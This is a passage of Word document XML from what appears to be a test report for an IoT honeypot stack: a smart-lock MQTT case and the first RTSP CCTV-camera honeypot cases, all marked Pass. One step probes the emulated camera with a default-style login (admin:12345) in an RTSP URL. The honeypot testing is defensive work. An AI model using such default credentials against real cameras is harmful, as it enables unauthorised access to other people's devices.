              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">PUBLISH lock/cmd 'lock'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Topic lock/cmd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Lock state changes to locked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Redis device:smartlock lock_state = locked; state_change event</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9041" w:name="_Toc69041"/>
      <w:r>
        <w:t xml:space="preserve">RTSP Honeypot (CCTV Camera)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9041"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tests the RTSP honeypot emulating the CCTV camera stream (published on port 554).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">19</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Test Cases for the RTSP Camera</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpYSpec="inside"/>
        <w:tblW w:w="11146" w:type="dxa"/>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CellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="641"/>
        <w:gridCol w:w="974"/>
        <w:gridCol w:w="1466"/>
        <w:gridCol w:w="1396"/>
        <w:gridCol w:w="1575"/>
        <w:gridCol w:w="1114"/>
        <w:gridCol w:w="1513"/>
        <w:gridCol w:w="1709"/>
        <w:gridCol w:w="758"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="39D0FE0D" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="518"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Preconditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Input</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Expected Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Actual Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-RTSP-001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">RTSP Honeypot (CCTV Camera)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify a real client accepts the camera</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack running</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">ffprobe rtsp://admin:12345@host/Streaming/Channels/101</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">ffprobe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">DESCRIBE answered and logged</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">DESCRIBE requests logged; SDP with H.264 track returned</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-RTSP-002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">RTSP Honeypot (CCTV Camera)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify OPTIONS lists the supported methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack running</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">OPTIONS rtsp://host/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">200 with Public header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Public: OPTIONS, DESCRIBE, SETUP, TEARDOWN, PLAY, PAUSE, GET_PARAMETER, SET_PARAMETER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-RTSP-003</w:t>
            </w:r>
          </w:p>
